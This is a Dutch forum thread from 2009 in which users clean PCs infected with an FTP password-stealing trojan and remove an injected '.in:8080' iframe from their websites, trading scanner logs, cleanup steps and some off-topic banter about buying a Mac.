Je kan van ook redelijk snel zoeken op dit virus. In windows de drive selecteren met rechts waar je html/php bestanden staan. Kies dan 'search' (of zoeken). In het bovenste invoerveld voer je dan in *.php, *.htm* in, en in het veld eronder .in:8080. Dan op search/zoeken klikken, en je krijgt alle files te zien waar de iframe is ingevoegd.
Het weghalen van deze code moet je natuurlijk pas doen als de veroorzaker van je pc af is. Je kan dan met zoeken en vervangen dit weghalen. Ik heb zelf met Crimson Editor dit gedaan, omdat je dan in alle bestanden het in een keer kan doen (ok, in batches van 500 files tegelijk).
Maar goed, ik zou een goeie claim neerleggen bij PCExtreme...
Niks gevonden!quote:Op dinsdag 11 augustus 2009 @ 18:59 schreef freud het volgende:
*verhaal*
Wat vindt jij van die volledig herstel van mij?quote:Op dinsdag 11 augustus 2009 19:27 schreef CantFazeMe het volgende:
Sorry dat ik zo snel weg was.Had een etentje.
Maar @MissBliss, je hebt al gescant naar een reboot? Trojan.Agent heeft namelijk het patroon om ook na een reboot terug te komen.
Same here, maar dan ook na een volledig herstelquote:Op dinsdag 11 augustus 2009 19:32 schreef MissBliss het volgende:
Nu bezig met een scan na reboot.
Ik vind het raar dat ie er opeens niet meer is.quote:Op dinsdag 11 augustus 2009 19:33 schreef Qwea het volgende:
[..]
Wat vindt jij van die volledig herstel van mij?
Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks.quote:Op dinsdag 11 augustus 2009 19:36 schreef CantFazeMe het volgende:
[..]
Ik vind het raar dat ie er opeens niet meer is.Maar de worm infecteert dus zich via netwerken en malwarebytes gaf bij jouw 0 infecties aan. Dus ik ga ervan uit dat het goed is. Je kunt ook e.v. Combofix gebruiken maar die vind ik erg risicovol.
Database versie: 2605
Windows 6.0.6001 Service Pack 1 (Safe Mode)
11-8-2009 19:35:50
mbam-log-2009-08-11 (19-35-50).txt
Scan type: Volledige Scan (C:\|D:\|F:\|)
Objecten gescand: 186398
Verstreken tijd: 24 minute(s), 54 second(s)
Registersleutels geïnfecteerd: 0
Registerwaarden geïnfecteerd: 0
Mappen geïnfecteerd: 0
Bestanden geïnfecteerd: 0
Mappen geïnfecteerd:
Bestanden geïnfecteerd:
Dat zit wel goed!quote:Op dinsdag 11 augustus 2009 19:37 schreef Qwea het volgende:
[..]
Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks.
Logje van nu ;
[..]
Combofix is ook een soort Malwarebytes, maar het is alleen in een CMD bestand. Ik vind het risicovol, want hij wijzigt ook je systeem tijdelijk tijdens de scan. Na de scan als je hem verwijderd wordt alles wel normaal. (je moet zelf nog wel wat aanpassen maar goed.) Ik gebruik het alleen als een laatste redmiddel.quote:Op dinsdag 11 augustus 2009 19:38 schreef Qwea het volgende:
wat is combofix trouwens?
Ooh en avast doet nu voordat windows opgestart is een scan
*netjes afblijftquote:Op dinsdag 11 augustus 2009 19:42 schreef CantFazeMe het volgende:
En ik raad je het niet aan om aan te beginnen als je er niks van af weet.
Ik wilde online scannen van trend micro.. maar dat ding doet het hierzo nietquote:Op dinsdag 11 augustus 2009 20:46 schreef freud het volgende:
Het is trouwens ook wel aan te bevelen om na het scannen met je eigen virusscanner, nog een andere te draaien. Symantec en mcafee bieden online scanners aan. Is wel aan te raden om die ook nog eroverheen te gooien, just in case.
Ja, klaar en niks gevondenquote:Op dinsdag 11 augustus 2009 @ 20:51 schreef Qwea het volgende:
trouwens MB ; ding al klaar? nog wat gevonden?
nice!quote:Op dinsdag 11 augustus 2009 20:52 schreef MissBliss het volgende:
[..]
Ja, klaar en niks gevonden
Misschien zet ik zo avast nog maar een keer aan
ik heb greys ook maar een PM gedaanquote:Op dinsdag 11 augustus 2009 21:04 schreef MissBliss het volgende:
Ja, ik had zelfs gevraagd: goh, doet mijn site ook raar bij jullie?![]()
Hier wel lijkt het. Image van de dag dat ik de laptop kreeg (6 aug) terug gezet... en volgens de buurman en mistermaniac is dat voldoende omdat ook de reg sleutels worden overschreven.quote:
Ik zal mijn website eens bekiekenquote:Op dinsdag 11 augustus 2009 23:49 schreef Mr.Noodle het volgende:
Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.
MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.
Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
Dizer gaat mijn website opnieuw online zetten en mijn ww veranderen. Ik laat hem dit wel even lezen!quote:Op dinsdag 11 augustus 2009 @ 23:49 schreef Mr.Noodle het volgende:
Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.
MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.
Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
Ja, this should do, vergeet je niet dat dat ding (ik las ergens op google al 9x zoiets) zich soms terug zet na rebootquote:Op woensdag 12 augustus 2009 23:15 schreef St4ck3r het volgende:
Ik heb nu zelf ongeveer 15 van dit soort klanten gehad (ISP)
Zoals ik eerder al vermelde, zorg eerst dat je eigen pc schoon is! Pleur je FTP programma er even af en draai verschillende virusprogramma's + spyware scanners.
Daarna laat je eerst (of doe je zelf) je wachtwoorden wijzigen.. Deze zijn namelijk nu bekend bij het desbetreffende virus.. In de tussentijd laat je iemand wiens PC wél clean is even het iframe verwijderen.
This should do...
mijne is mooi schoon na een nieuwe image terugzettenquote:Op woensdag 12 augustus 2009 23:29 schreef St4ck3r het volgende:
Tja, in theorie had ik me eigen pc al lang een herinstall gegeven... Maar heb zelf 14 hostingpakketten en daar heb ik nergens last van...
Volgens is het altijd direct je index pagina. Zeker omdat je na de domeinnaam geen aparte bestandsnaam opgeeft.quote:Op woensdag 12 augustus 2009 21:23 schreef freud het volgende:
Goeie site, je kan alleen niet zien in welke pagina de link zit
Zeker weten kan ik het niet zonder format las ik in dit topicquote:
nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscanquote:Op donderdag 13 augustus 2009 08:41 schreef Swetsenegger het volgende:
Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
Christ...quote:Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:
[..]
nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan(clean install zou wellicht sneller gaan)
Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!!quote:Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:
[..]
nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan(clean install zou wellicht sneller gaan)
nou, dat was hier wel de snelste manier jaquote:Op donderdag 13 augustus 2009 08:41 schreef Swetsenegger het volgende:
Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
quote:Op donderdag 13 augustus 2009 10:37 schreef Dizer het volgende:
[..]
Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!!
Weg met al het gezeur wat je altijd hebt op de computer. Weg met alle virussen die je telkens hebt....
Weg met al je HD gezeur dat elke keer niet werkt, zet er 2 TB externe HD's naast..
Weg met moederbord dat ontploft...
[ afbeelding ]
24" LED Scherm
2.66 GHZ dual core
4 GB geheugen
640 GB HD
1399 incl BTW
En voor 1699 incl BTW heb je een nog snellere!
Ja maar je kent Re niet en zijn computers. Nachtenlang heb ik er aan moeten werken elke keerquote:Op donderdag 13 augustus 2009 10:41 schreef Qwea het volgende:
[..]heb je weer zo'n apple ophemeler. Ik heb nooit een hdd gehad die niet werkte... ook is mn mobo niet ontploft. En zodra mac os X en linux meer in opmars komen net zoals de gewone pc/windows.... dan krijg je ook virussen.
Als je écht voor een mac gaat, neem dan die van 1699quote:Op donderdag 13 augustus 2009 11:07 schreef Re het volgende:
ja ja, kan hem natuurlijk wel weer van de belastingen aftrekken
Snap je waarom mensen nu over gaan op Mac..quote:Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:
[..]
Dat laatste is onzin.. Het marktaandeel EN het feit dat praktisch geen enkele mac gebruiker een virusscanner heeft draaien is de natte droom van iedere virusschrijver. Het is blijkbaar verrekte moeilijk.quote:Op donderdag 13 augustus 2009 10:41 schreef Qwea het volgende:
[..]heb je weer zo'n apple ophemeler. Ik heb nooit een hdd gehad die niet werkte... ook is mn mobo niet ontploft. En zodra mac os X en linux meer in opmars komen net zoals de gewone pc/windows.... dan krijg je ook virussen.
dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweedequote:Op donderdag 13 augustus 2009 13:16 schreef Mr.Noodle het volgende:
[..]
Snap je waarom mensen nu over gaan op Mac..NoFi
Wehehehe.... nieuwe software... wheheheheheheehquote:Op donderdag 13 augustus 2009 14:09 schreef Re het volgende:
[..]
dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweede
Dat bedenk ik me dus ook (nog steeds ftp niet aangeraakt, macje komt maandagquote:Op donderdag 13 augustus 2009 16:26 schreef Swetsenegger het volgende:
Je bent een hele dag bezig geweest
Nee kost weinig moeite, een dag productie kwijt.
|
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |